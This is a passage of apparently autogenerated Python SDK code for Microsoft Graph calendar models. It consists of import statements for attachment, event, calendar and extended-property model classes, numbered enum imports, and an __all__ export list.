'Enum380',
'Enum381',
'Enum382',
'Enum383',
'Enum384',
'Enum385',
'Enum386',
'Enum387',
'Enum388',
'Enum389',
'Enum39',
'Enum390',
'Enum391',
'Enum392',
'Enum393',
'Enum394',
'Enum395',
'Enum396',
'Enum397',
'Enum398',
'Enum399',
'Enum40',
'Enum400',
'Enum401',
'Enum402',
'Enum403',
'Enum404',
'Enum405',
'Enum406',
'Enum407',
'Enum408',
'Enum409',
'Enum41',
'Enum410',
'Enum411',
'Enum412',
'Enum413',
'Enum414',
'Enum415',
'Enum416',
'Enum417',
'Enum418',
'Enum419',
'Enum42',
'Enum420',
'Enum421',
'Enum422',
'Enum423',
'Enum424',
'Enum425',
'Enum426',
'Enum427',
'Enum428',
'Enum429',
'Enum43',
'Enum430',
'Enum431',
'Enum432',
'Enum433',
'Enum434',
'Enum435',
'Enum436',
'Enum437',
'Enum438',
'Enum439',
'Enum44',
'Enum440',
'Enum441',
'Enum442',
'Enum443',
'Enum444',
'Enum445',
'Enum446',
'Enum447',
'Enum448',
'Enum449',
'Enum45',
'Enum450',
'Enum451',
'Enum452',
'Enum453',
'Enum454',
'Enum455',
'Enum456',
'Enum457',
'Enum458',
'Enum459',
'Enum46',
'Enum460',
'Enum461',
'Enum462',
'Enum463',
'Enum464',
'Enum465',
'Enum466',
'Enum467',
'Enum468',
'Enum469',
'Enum47',
'Enum470',
'Enum471',
'Enum472',
'Enum473',
'Enum474',
'Enum475',
'Enum48',
'Enum49',
'Enum50',
'Enum51',
'Enum52',
'Enum53',
'Enum54',
'Enum55',
'Enum56',
'Enum57',
'Enum58',
'Enum59',
'Enum60',
'Enum61',
'Enum62',
'Enum63',
'Enum64',
'Enum65',
'Enum66',
'Enum67',
'Enum68',
'Enum69',
'Enum70',
'Enum71',
'Enum72',
'Enum73',
'Enum74',
'Enum75',
'Enum76',
'Enum77',
'Enum78',
'Enum79',
'Enum80',
'Enum81',
'Enum82',
'Enum83',
'Enum84',
'Enum85',
'Enum86',
'Enum87',
'Enum88',
'Enum89',
'Enum90',
'Enum91',
'Enum92',
'Enum93',
'Enum94',
'Enum95',
'Enum96',
'Enum97',
'Enum98',
'Enum99',
'Get10ItemsItem',
'Get1ItemsItem',
'Get2ItemsItem',
'Get4ItemsItem',
'Get5ItemsItem',
'Get6ItemsItem',
'Get7ItemsItem',
'Get9ItemsItem',
'MicrosoftGraphAttendeeType',
'MicrosoftGraphBodyType',
'MicrosoftGraphCalendarColor',
'MicrosoftGraphCalendarRoleType',
'MicrosoftGraphDayOfWeek',
'MicrosoftGraphEventType',
'MicrosoftGraphFreeBusyStatus',
'MicrosoftGraphImportance',
'MicrosoftGraphLocationType',
'MicrosoftGraphLocationUniqueIdType',
'MicrosoftGraphOnlineMeetingProviderType',
'MicrosoftGraphPhoneType',
'MicrosoftGraphPhysicalAddressType',
'MicrosoftGraphRecurrencePatternType',
'MicrosoftGraphRecurrenceRangeType',
'MicrosoftGraphResponseType',
'MicrosoftGraphSensitivity',
'MicrosoftGraphWeekIndex',
]
| 27.820296 | 94 | 0.703321 |
try:
from ._models_py3 import CollectionOfAttachment
from ._models_py3 import CollectionOfAttachment0
from ._models_py3 import CollectionOfAttachment1
from ._models_py3 import CollectionOfAttachment10
from ._models_py3 import CollectionOfAttachment2
from ._models_py3 import CollectionOfAttachment3
from ._models_py3 import CollectionOfAttachment4
from ._models_py3 import CollectionOfAttachment5
from ._models_py3 import CollectionOfAttachment6
from ._models_py3 import CollectionOfAttachment7
from ._models_py3 import CollectionOfAttachment8
from ._models_py3 import CollectionOfAttachment9
from ._models_py3 import CollectionOfCalendar
from ._models_py3 import CollectionOfCalendar0
from ._models_py3 import CollectionOfCalendarGroup
from ._models_py3 import CollectionOfCalendarPermission
from ._models_py3 import CollectionOfCalendarPermission0
from ._models_py3 import CollectionOfCalendarPermission1
from ._models_py3 import CollectionOfCalendarPermission2
from ._models_py3 import CollectionOfCalendarPermission3
from ._models_py3 import CollectionOfCalendarPermission4
from ._models_py3 import CollectionOfCalendarPermission5
from ._models_py3 import CollectionOfCalendarPermission6
from ._models_py3 import CollectionOfEvent
from ._models_py3 import CollectionOfEvent0
from ._models_py3 import CollectionOfEvent1
from ._models_py3 import CollectionOfEvent10
from ._models_py3 import CollectionOfEvent11
from ._models_py3 import CollectionOfEvent12
from ._models_py3 import CollectionOfEvent13
from ._models_py3 import CollectionOfEvent14
from ._models_py3 import CollectionOfEvent15
from ._models_py3 import CollectionOfEvent16
from ._models_py3 import CollectionOfEvent17
from ._models_py3 import CollectionOfEvent18
from ._models_py3 import CollectionOfEvent19
from ._models_py3 import CollectionOfEvent2
from ._models_py3 import CollectionOfEvent20
from ._models_py3 import CollectionOfEvent21
from ._models_py3 import CollectionOfEvent22
from ._models_py3 import CollectionOfEvent23
from ._models_py3 import CollectionOfEvent24
from ._models_py3 import CollectionOfEvent25
from ._models_py3 import CollectionOfEvent26
from ._models_py3 import CollectionOfEvent27
from ._models_py3 import CollectionOfEvent28
from ._models_py3 import CollectionOfEvent29
from ._models_py3 import CollectionOfEvent3
from ._models_py3 import CollectionOfEvent30
from ._models_py3 import CollectionOfEvent31
from ._models_py3 import CollectionOfEvent32
from ._models_py3 import CollectionOfEvent33
from ._models_py3 import CollectionOfEvent34
from ._models_py3 import CollectionOfEvent35
from ._models_py3 import CollectionOfEvent36
from ._models_py3 import CollectionOfEvent37
from ._models_py3 import CollectionOfEvent38
from ._models_py3 import CollectionOfEvent39
from ._models_py3 import CollectionOfEvent4
from ._models_py3 import CollectionOfEvent40
from ._models_py3 import CollectionOfEvent41
from ._models_py3 import CollectionOfEvent42
from ._models_py3 import CollectionOfEvent5
from ._models_py3 import CollectionOfEvent6
from ._models_py3 import CollectionOfEvent7
from ._models_py3 import CollectionOfEvent8
from ._models_py3 import CollectionOfEvent9
from ._models_py3 import CollectionOfExtension
from ._models_py3 import CollectionOfExtension0
from ._models_py3 import CollectionOfExtension1
from ._models_py3 import CollectionOfExtension10
from ._models_py3 import CollectionOfExtension2
from ._models_py3 import CollectionOfExtension3
from ._models_py3 import CollectionOfExtension4
from ._models_py3 import CollectionOfExtension5
from ._models_py3 import CollectionOfExtension6
from ._models_py3 import CollectionOfExtension7
from ._models_py3 import CollectionOfExtension8
from ._models_py3 import CollectionOfExtension9
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty0
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty1
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty10
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty11
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty12
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty13
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty14
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty15
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty16
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty17
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty18
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty2
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty3
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty4
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty5
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty6
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty7
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty8
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty9
from ._models_py3 import CollectionOfPlace
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty0
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty1
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty10
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty11
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty12
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty13
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty14
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty15
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty16
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty17
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty18
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty2
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty3
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty4
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty5
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty6
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty7
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty8
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty9
from ._models_py3 import MicrosoftGraphAttachment
from ._models_py3 import MicrosoftGraphAttendee
from ._models_py3 import MicrosoftGraphAttendeeBase
from ._models_py3 import MicrosoftGraphCalendar
from ._models_py3 import MicrosoftGraphCalendarGroup
from ._models_py3 import MicrosoftGraphCalendarPermission
from ._models_py3 import MicrosoftGraphDateTimeZone
from ._models_py3 import MicrosoftGraphEmailAddress
from ._models_py3 import MicrosoftGraphEntity
from ._models_py3 import MicrosoftGraphEvent
from ._models_py3 import MicrosoftGraphExtension
from ._models_py3 import MicrosoftGraphItemBody
from ._models_py3 import MicrosoftGraphLocation
from ._models_py3 import MicrosoftGraphMultiValueLegacyExtendedProperty
from ._models_py3 import MicrosoftGraphOnlineMeetingInfo
from ._models_py3 import MicrosoftGraphOutlookGeoCoordinates
from ._models_py3 import MicrosoftGraphOutlookItem
from ._models_py3 import MicrosoftGraphPatternedRecurrence
from ._models_py3 import MicrosoftGraphPhone
from ._models_py3 import MicrosoftGraphPhysicalAddress
from ._models_py3 import MicrosoftGraphPlace
from ._models_py3 import MicrosoftGraphRecipient
from ._models_py3 import MicrosoftGraphRecurrencePattern
from ._models_py3 import MicrosoftGraphRecurrenceRange
from ._models_py3 import MicrosoftGraphResponseStatus
from ._models_py3 import MicrosoftGraphSingleValueLegacyExtendedProperty
from ._models_py3 import MicrosoftGraphTimeSlot
from ._models_py3 import OdataError
from ._models_py3 import OdataErrorDetail
from ._models_py3 import OdataErrorMain
except (SyntaxError, ImportError):
from ._models import CollectionOfAttachment
from ._models import CollectionOfAttachment0
from ._models import CollectionOfAttachment1
from ._models import CollectionOfAttachment10
from ._models import CollectionOfAttachment2
from ._models import CollectionOfAttachment3
from ._models import CollectionOfAttachment4
from ._models import CollectionOfAttachment5
from ._models import CollectionOfAttachment6
from ._models import CollectionOfAttachment7
from ._models import CollectionOfAttachment8
from ._models import CollectionOfAttachment9
from ._models import CollectionOfCalendar
from ._models import CollectionOfCalendar0
from ._models import CollectionOfCalendarGroup
from ._models import CollectionOfCalendarPermission
from ._models import CollectionOfCalendarPermission0
from ._models import CollectionOfCalendarPermission1
from ._models import CollectionOfCalendarPermission2
from ._models import CollectionOfCalendarPermission3
from ._models import CollectionOfCalendarPermission4
from ._models import CollectionOfCalendarPermission5
from ._models import CollectionOfCalendarPermission6
from ._models import CollectionOfEvent
from ._models import CollectionOfEvent0
from ._models import CollectionOfEvent1
from ._models import CollectionOfEvent10
from ._models import CollectionOfEvent11
from ._models import CollectionOfEvent12
from ._models import CollectionOfEvent13
from ._models import CollectionOfEvent14
from ._models import CollectionOfEvent15
from ._models import CollectionOfEvent16
from ._models import CollectionOfEvent17
from ._models import CollectionOfEvent18
from ._models import CollectionOfEvent19
from ._models import CollectionOfEvent2
from ._models import CollectionOfEvent20
from ._models import CollectionOfEvent21
from ._models import CollectionOfEvent22
from ._models import CollectionOfEvent23
from ._models import CollectionOfEvent24
from ._models import CollectionOfEvent25
from ._models import CollectionOfEvent26
from ._models import CollectionOfEvent27
from ._models import CollectionOfEvent28
from ._models import CollectionOfEvent29
from ._models import CollectionOfEvent3
from ._models import CollectionOfEvent30
from ._models import CollectionOfEvent31
from ._models import CollectionOfEvent32
from ._models import CollectionOfEvent33
from ._models import CollectionOfEvent34
from ._models import CollectionOfEvent35
from ._models import CollectionOfEvent36
from ._models import CollectionOfEvent37
from ._models import CollectionOfEvent38
from ._models import CollectionOfEvent39
from ._models import CollectionOfEvent4
from ._models import CollectionOfEvent40
from ._models import CollectionOfEvent41
from ._models import CollectionOfEvent42
from ._models import CollectionOfEvent5
from ._models import CollectionOfEvent6
from ._models import CollectionOfEvent7
from ._models import CollectionOfEvent8
from ._models import CollectionOfEvent9
from ._models import CollectionOfExtension
from ._models import CollectionOfExtension0
from ._models import CollectionOfExtension1
from ._models import CollectionOfExtension10
from ._models import CollectionOfExtension2
from ._models import CollectionOfExtension3
from ._models import CollectionOfExtension4
from ._models import CollectionOfExtension5
from ._models import CollectionOfExtension6
from ._models import CollectionOfExtension7
from ._models import CollectionOfExtension8
from ._models import CollectionOfExtension9
from ._models import CollectionOfMultiValueLegacyExtendedProperty
from ._models import CollectionOfMultiValueLegacyExtendedProperty0
from ._models import CollectionOfMultiValueLegacyExtendedProperty1
from ._models import CollectionOfMultiValueLegacyExtendedProperty10
from ._models import CollectionOfMultiValueLegacyExtendedProperty11
from ._models import CollectionOfMultiValueLegacyExtendedProperty12
from ._models import CollectionOfMultiValueLegacyExtendedProperty13
from ._models import CollectionOfMultiValueLegacyExtendedProperty14
from ._models import CollectionOfMultiValueLegacyExtendedProperty15
from ._models import CollectionOfMultiValueLegacyExtendedProperty16
from ._models import CollectionOfMultiValueLegacyExtendedProperty17
from ._models import CollectionOfMultiValueLegacyExtendedProperty18
from ._models import CollectionOfMultiValueLegacyExtendedProperty2
from ._models import CollectionOfMultiValueLegacyExtendedProperty3
from ._models import CollectionOfMultiValueLegacyExtendedProperty4
from ._models import CollectionOfMultiValueLegacyExtendedProperty5
from ._models import CollectionOfMultiValueLegacyExtendedProperty6
from ._models import CollectionOfMultiValueLegacyExtendedProperty7
from ._models import CollectionOfMultiValueLegacyExtendedProperty8
from ._models import CollectionOfMultiValueLegacyExtendedProperty9
from ._models import CollectionOfPlace
from ._models import CollectionOfSingleValueLegacyExtendedProperty
from ._models import CollectionOfSingleValueLegacyExtendedProperty0
from ._models import CollectionOfSingleValueLegacyExtendedProperty1
from ._models import CollectionOfSingleValueLegacyExtendedProperty10
from ._models import CollectionOfSingleValueLegacyExtendedProperty11
from ._models import CollectionOfSingleValueLegacyExtendedProperty12
from ._models import CollectionOfSingleValueLegacyExtendedProperty13
from ._models import CollectionOfSingleValueLegacyExtendedProperty14
from ._models import CollectionOfSingleValueLegacyExtendedProperty15
from ._models import CollectionOfSingleValueLegacyExtendedProperty16
from ._models import CollectionOfSingleValueLegacyExtendedProperty17
from ._models import CollectionOfSingleValueLegacyExtendedProperty18
from ._models import CollectionOfSingleValueLegacyExtendedProperty2
from ._models import CollectionOfSingleValueLegacyExtendedProperty3
from ._models import CollectionOfSingleValueLegacyExtendedProperty4
from ._models import CollectionOfSingleValueLegacyExtendedProperty5
from ._models import CollectionOfSingleValueLegacyExtendedProperty6
from ._models import CollectionOfSingleValueLegacyExtendedProperty7
from ._models import CollectionOfSingleValueLegacyExtendedProperty8
from ._models import CollectionOfSingleValueLegacyExtendedProperty9
from ._models import MicrosoftGraphAttachment
from ._models import MicrosoftGraphAttendee
from ._models import MicrosoftGraphAttendeeBase
from ._models import MicrosoftGraphCalendar
from ._models import MicrosoftGraphCalendarGroup
from ._models import MicrosoftGraphCalendarPermission
from ._models import MicrosoftGraphDateTimeZone
from ._models import MicrosoftGraphEmailAddress
from ._models import MicrosoftGraphEntity
from ._models import MicrosoftGraphEvent
from ._models import MicrosoftGraphExtension
from ._models import MicrosoftGraphItemBody
from ._models import MicrosoftGraphLocation
from ._models import MicrosoftGraphMultiValueLegacyExtendedProperty
from ._models import MicrosoftGraphOnlineMeetingInfo
from ._models import MicrosoftGraphOutlookGeoCoordinates
from ._models import MicrosoftGraphOutlookItem
from ._models import MicrosoftGraphPatternedRecurrence
from ._models import MicrosoftGraphPhone
from ._models import MicrosoftGraphPhysicalAddress
from ._models import MicrosoftGraphPlace
from ._models import MicrosoftGraphRecipient
from ._models import MicrosoftGraphRecurrencePattern
from ._models import MicrosoftGraphRecurrenceRange
from ._models import MicrosoftGraphResponseStatus
from ._models import MicrosoftGraphSingleValueLegacyExtendedProperty
from ._models import MicrosoftGraphTimeSlot
from ._models import OdataError
from ._models import OdataErrorDetail
from ._models import OdataErrorMain
from ._calendar_enums import (
Enum100,
Enum101,
Enum102,
Enum103,
Enum104,
Enum105,
Enum106,
Enum107,
Enum108,
Enum109,
Enum110,
Enum111,
Enum112,
Enum113,
Enum114,
Enum115,
Enum116,
Enum117,
Enum118,
Enum119,
Enum120,
Enum121,
Enum122,
Enum123,
Enum124,
Enum125,
Enum126,
Enum127,
Enum128,
Enum129,
Enum130,
Enum131,
Enum132,
Enum133,
Enum134,
Enum135,
Enum136,
Enum137,
Enum138,
Enum139,
Enum140,
Enum141,
Enum142,
Enum143,
Enum144,
Enum145,
Enum146,
Enum147,
Enum148,
Enum149,
Enum150,
Enum151,
Enum152,
Enum153,
Enum154,
Enum155,
Enum156,
Enum157,
Enum158,
Enum159,
Enum160,
Enum161,
Enum162,
Enum163,
Enum164,
Enum165,
Enum166,
Enum167,
Enum168,
Enum169,
Enum170,
Enum171,
Enum172,
Enum173,
Enum174,
Enum175,
Enum176,
Enum177,
Enum178,
Enum179,
Enum180,
Enum181,
Enum182,
Enum183,
Enum184,
Enum185,
Enum186,
Enum187,
Enum188,
Enum189,
Enum190,
Enum191,
Enum192,
Enum193,
Enum194,
Enum195,
Enum196,
Enum197,
Enum198,
Enum199,
Enum200,
Enum201,
Enum202,
Enum203,
Enum204,
Enum205,
Enum206,
Enum207,
Enum208,
Enum209,
Enum210,
Enum211,
Enum212,
Enum213,
Enum214,
Enum215,
Enum216,
Enum217,
Enum218,
Enum219,
Enum22,
Enum220,
Enum221,
Enum222,
Enum223,
Enum224,
Enum225,
Enum226,
Enum227,
Enum228,
Enum229,
Enum23,
Enum230,
Enum231,
Enum232,
Enum233,
Enum234,
Enum235,
Enum236,
Enum237,
Enum238,
Enum239,
Enum240,
Enum241,
Enum242,
Enum243,
Enum244,
Enum245,
Enum246,
Enum247,
Enum248,
Enum249,
Enum250,
Enum251,
Enum252,
Enum253,
Enum254,
Enum255,
Enum256,
Enum257,
Enum258,
Enum259,
Enum260,
Enum261,
Enum262,
Enum263,
Enum264,
Enum265,
Enum266,
Enum267,
Enum268,
Enum269,
Enum270,
Enum271,
Enum272,
Enum273,
Enum274,
Enum275,
Enum276,
Enum277,
Enum278,
Enum279,
Enum28,
Enum280,
Enum281,
Enum282,
Enum283,
Enum284,
Enum285,
Enum286,
Enum287,
Enum288,
Enum289,
Enum29,
Enum290,
Enum291,
Enum292,
Enum293,
Enum294,
Enum295,
Enum296,
Enum297,
Enum298,
Enum299,
Enum30,
Enum300,
Enum301,
Enum302,
Enum303,
Enum304,
Enum305,
Enum306,
Enum307,
Enum308,
Enum309,
Enum31,
Enum310,
Enum311,
Enum312,
Enum313,
Enum314,
Enum315,
Enum316,
Enum317,
Enum318,
Enum319,
Enum32,
Enum320,
Enum321,
Enum322,
Enum323,
Enum324,
Enum325,
Enum326,
Enum327,
Enum328,
Enum329,
Enum33,
Enum330,
Enum331,
Enum332,
Enum333,
Enum334,
Enum335,
Enum336,
Enum337,
Enum338,
Enum339,
Enum34,
Enum340,
Enum341,
Enum342,
Enum343,
Enum344,
Enum345,
Enum346,
Enum347,
Enum348,
Enum349,
Enum35,
Enum350,
Enum351,
Enum352,
Enum353,
Enum354,
Enum355,
Enum356,
Enum357,
Enum358,
Enum359,
Enum36,
Enum360,
Enum361,
Enum362,
Enum363,
Enum364,
Enum365,
Enum366,
Enum367,
Enum368,
Enum369,
Enum37,
Enum370,
Enum371,
Enum372,
Enum373,
Enum374,
Enum375,
Enum376,
Enum377,
Enum378,
Enum379,
Enum38,
Enum380,
Enum381,
Enum382,
Enum383,
Enum384,
Enum385,
Enum386,
Enum387,
Enum388,
Enum389,
Enum39,
Enum390,
Enum391,
Enum392,
Enum393,
Enum394,
Enum395,
Enum396,
Enum397,
Enum398,
Enum399,
Enum40,
Enum400,
Enum401,
Enum402,
Enum403,
Enum404,
Enum405,
Enum406,
Enum407,
Enum408,
Enum409,
Enum41,
Enum410,
Enum411,
Enum412,
Enum413,
Enum414,
Enum415,
Enum416,
Enum417,
Enum418,
Enum419,
Enum42,
Enum420,
Enum421,
Enum422,
Enum423,
Enum424,
Enum425,
Enum426,
Enum427,
Enum428,
Enum429,
Enum43,
Enum430,
Enum431,
Enum432,
Enum433,
Enum434,
Enum435,
Enum436,
Enum437,
Enum438,
Enum439,
Enum44,
Enum440,
Enum441,
Enum442,
Enum443,
Enum444,
Enum445,
Enum446,
Enum447,
Enum448,
Enum449,
Enum45,
Enum450,
Enum451,
Enum452,
Enum453,
Enum454,
Enum455,
Enum456,
Enum457,
Enum458,
Enum459,
Enum46,
Enum460,
Enum461,
Enum462,
Enum463,
Enum464,
Enum465,
Enum466,
Enum467,
Enum468,
Enum469,
Enum47,
Enum470,
Enum471,
Enum472,
Enum473,
Enum474,
Enum475,
Enum48,
Enum49,
Enum50,
Enum51,
Enum52,
Enum53,
Enum54,
Enum55,
Enum56,
Enum57,
Enum58,
Enum59,
Enum60,
Enum61,
Enum62,
Enum63,
Enum64,
Enum65,
Enum66,
Enum67,
Enum68,
Enum69,
Enum70,
Enum71,
Enum72,
Enum73,
Enum74,
Enum75,
Enum76,
Enum77,
Enum78,
Enum79,
Enum80,
Enum81,
Enum82,
Enum83,
Enum84,
Enum85,
Enum86,
Enum87,
Enum88,
Enum89,
Enum90,
Enum91,
Enum92,
Enum93,
Enum94,
Enum95,
Enum96,
Enum97,
Enum98,
Enum99,
Get10ItemsItem,
Get1ItemsItem,
Get2ItemsItem,
Get4ItemsItem,
Get5ItemsItem,
Get6ItemsItem,
Get7ItemsItem,
Get9ItemsItem,
MicrosoftGraphAttendeeType,
MicrosoftGraphBodyType,
MicrosoftGraphCalendarColor,
MicrosoftGraphCalendarRoleType,
MicrosoftGraphDayOfWeek,
MicrosoftGraphEventType,
MicrosoftGraphFreeBusyStatus,
MicrosoftGraphImportance,
MicrosoftGraphLocationType,
MicrosoftGraphLocationUniqueIdType,
MicrosoftGraphOnlineMeetingProviderType,
MicrosoftGraphPhoneType,
MicrosoftGraphPhysicalAddressType,
MicrosoftGraphRecurrencePatternType,
MicrosoftGraphRecurrenceRangeType,
MicrosoftGraphResponseType,
MicrosoftGraphSensitivity,
MicrosoftGraphWeekIndex,
)
__all__ = [
'CollectionOfAttachment',
'CollectionOfAttachment0',
'CollectionOfAttachment1',
'CollectionOfAttachment10',
'CollectionOfAttachment2',
'CollectionOfAttachment3',
'CollectionOfAttachment4',
'CollectionOfAttachment5',
'CollectionOfAttachment6',
'CollectionOfAttachment7',
'CollectionOfAttachment8',
'CollectionOfAttachment9',
'CollectionOfCalendar',
'CollectionOfCalendar0',
'CollectionOfCalendarGroup',
'CollectionOfCalendarPermission',
'CollectionOfCalendarPermission0',
'CollectionOfCalendarPermission1',
'CollectionOfCalendarPermission2',
'CollectionOfCalendarPermission3',
'CollectionOfCalendarPermission4',
'CollectionOfCalendarPermission5',
'CollectionOfCalendarPermission6',
'CollectionOfEvent',
'CollectionOfEvent0',
'CollectionOfEvent1',
'CollectionOfEvent10',
'CollectionOfEvent11',
'CollectionOfEvent12',
'CollectionOfEvent13',
'CollectionOfEvent14',
'CollectionOfEvent15',
'CollectionOfEvent16',
'CollectionOfEvent17',
'CollectionOfEvent18',
'CollectionOfEvent19',
'CollectionOfEvent2',
'CollectionOfEvent20',
'CollectionOfEvent21',
'CollectionOfEvent22',
'CollectionOfEvent23',
'CollectionOfEvent24',
'CollectionOfEvent25',
'CollectionOfEvent26',
'CollectionOfEvent27',
'CollectionOfEvent28',
'CollectionOfEvent29',
'CollectionOfEvent3',
'CollectionOfEvent30',
'CollectionOfEvent31',
'CollectionOfEvent32',
'CollectionOfEvent33',
'CollectionOfEvent34',
'CollectionOfEvent35',
'CollectionOfEvent36',
'CollectionOfEvent37',
'CollectionOfEvent38',
'CollectionOfEvent39',
'CollectionOfEvent4',
'CollectionOfEvent40',
'CollectionOfEvent41',
'CollectionOfEvent42',
'CollectionOfEvent5',
'CollectionOfEvent6',
'CollectionOfEvent7',
'CollectionOfEvent8',
'CollectionOfEvent9',
'CollectionOfExtension',
'CollectionOfExtension0',
'CollectionOfExtension1',
'CollectionOfExtension10',
'CollectionOfExtension2',
'CollectionOfExtension3',
'CollectionOfExtension4',
'CollectionOfExtension5',
'CollectionOfExtension6',
'CollectionOfExtension7',
'CollectionOfExtension8',
'CollectionOfExtension9',
'CollectionOfMultiValueLegacyExtendedProperty',
'CollectionOfMultiValueLegacyExtendedProperty0',
'CollectionOfMultiValueLegacyExtendedProperty1',
'CollectionOfMultiValueLegacyExtendedProperty10',
'CollectionOfMultiValueLegacyExtendedProperty11',
'CollectionOfMultiValueLegacyExtendedProperty12',
'CollectionOfMultiValueLegacyExtendedProperty13',
'CollectionOfMultiValueLegacyExtendedProperty14',
'CollectionOfMultiValueLegacyExtendedProperty15',
'CollectionOfMultiValueLegacyExtendedProperty16',
'CollectionOfMultiValueLegacyExtendedProperty17',
'CollectionOfMultiValueLegacyExtendedProperty18',
'CollectionOfMultiValueLegacyExtendedProperty2',
'CollectionOfMultiValueLegacyExtendedProperty3',
'CollectionOfMultiValueLegacyExtendedProperty4',
'CollectionOfMultiValueLegacyExtendedProperty5',
'CollectionOfMultiValueLegacyExtendedProperty6',
'CollectionOfMultiValueLegacyExtendedProperty7',
'CollectionOfMultiValueLegacyExtendedProperty8',
'CollectionOfMultiValueLegacyExtendedProperty9',
'CollectionOfPlace',
'CollectionOfSingleValueLegacyExtendedProperty',
'CollectionOfSingleValueLegacyExtendedProperty0',
'CollectionOfSingleValueLegacyExtendedProperty1',
'CollectionOfSingleValueLegacyExtendedProperty10',
'CollectionOfSingleValueLegacyExtendedProperty11',
'CollectionOfSingleValueLegacyExtendedProperty12',
'CollectionOfSingleValueLegacyExtendedProperty13',
'CollectionOfSingleValueLegacyExtendedProperty14',
'CollectionOfSingleValueLegacyExtendedProperty15',
'CollectionOfSingleValueLegacyExtendedProperty16',
'CollectionOfSingleValueLegacyExtendedProperty17',
'CollectionOfSingleValueLegacyExtendedProperty18',
'CollectionOfSingleValueLegacyExtendedProperty2',
'CollectionOfSingleValueLegacyExtendedProperty3',
'CollectionOfSingleValueLegacyExtendedProperty4',
'CollectionOfSingleValueLegacyExtendedProperty5',
'CollectionOfSingleValueLegacyExtendedProperty6',
'CollectionOfSingleValueLegacyExtendedProperty7',
'CollectionOfSingleValueLegacyExtendedProperty8',
'CollectionOfSingleValueLegacyExtendedProperty9',
'MicrosoftGraphAttachment',
'MicrosoftGraphAttendee',
'MicrosoftGraphAttendeeBase',
'MicrosoftGraphCalendar',
'MicrosoftGraphCalendarGroup',
'MicrosoftGraphCalendarPermission',
'MicrosoftGraphDateTimeZone',
'MicrosoftGraphEmailAddress',
'MicrosoftGraphEntity',
'MicrosoftGraphEvent',
'MicrosoftGraphExtension',
'MicrosoftGraphItemBody',
'MicrosoftGraphLocation',
'MicrosoftGraphMultiValueLegacyExtendedProperty',
'MicrosoftGraphOnlineMeetingInfo',
'MicrosoftGraphOutlookGeoCoordinates',
'MicrosoftGraphOutlookItem',
'MicrosoftGraphPatternedRecurrence',
'MicrosoftGraphPhone',
'MicrosoftGraphPhysicalAddress',
'MicrosoftGraphPlace',
'MicrosoftGraphRecipient',
'MicrosoftGraphRecurrencePattern',
'MicrosoftGraphRecurrenceRange',
'MicrosoftGraphResponseStatus',
'MicrosoftGraphSingleValueLegacyExtendedProperty',
'MicrosoftGraphTimeSlot',
'OdataError',
'OdataErrorDetail',
'OdataErrorMain',
'Enum100',
'Enum101',
'Enum102',
'Enum103',
'Enum104',
'Enum105',
'Enum106',
'Enum107',
'Enum108',
'Enum109',
'Enum110',
'Enum111',
'Enum112',
'Enum113',
'Enum114',
'Enum115',
'Enum116',
'Enum117',
'Enum118',
'Enum119',
'Enum120',
'Enum121',
'Enum122',
'Enum123',
'Enum124',
'Enum125',
'Enum126',
'Enum127',
'Enum128',
'Enum129',
'Enum130',
'Enum131',
'Enum132',
'Enum133',
'Enum134',
'Enum135',
'Enum136',
'Enum137',
'Enum138',
'Enum139',
'Enum140',
'Enum141',
'Enum142',
'Enum143',
'Enum144',
'Enum145',
'Enum146',
'Enum147',
'Enum148',
'Enum149',
'Enum150',
'Enum151',
'Enum152',
'Enum153',
'Enum154',
'Enum155',
'Enum156',
'Enum157',
'Enum158',
'Enum159',
'Enum160',
'Enum161',
'Enum162',
'Enum163',
'Enum164',
'Enum165',
'Enum166',
'Enum167',
'Enum168',
'Enum169',
'Enum170',
'Enum171',
'Enum172',
'Enum173',
'Enum174',
'Enum175',
'Enum176',
'Enum177',
'Enum178',
'Enum179',
'Enum180',
'Enum181',
'Enum182',
'Enum183',
'Enum184',
'Enum185',
'Enum186',
'Enum187',
'Enum188',
'Enum189',
'Enum190',
'Enum191',
'Enum192',
'Enum193',
'Enum194',
'Enum195',
'Enum196',
'Enum197',
'Enum198',
'Enum199',
'Enum200',
'Enum201',
'Enum202',
'Enum203',
'Enum204',
'Enum205',
'Enum206',
'Enum207',
'Enum208',
'Enum209',
'Enum210',
'Enum211',
'Enum212',
'Enum213',
'Enum214',
'Enum215',
'Enum216',
'Enum217',
'Enum218',
'Enum219',
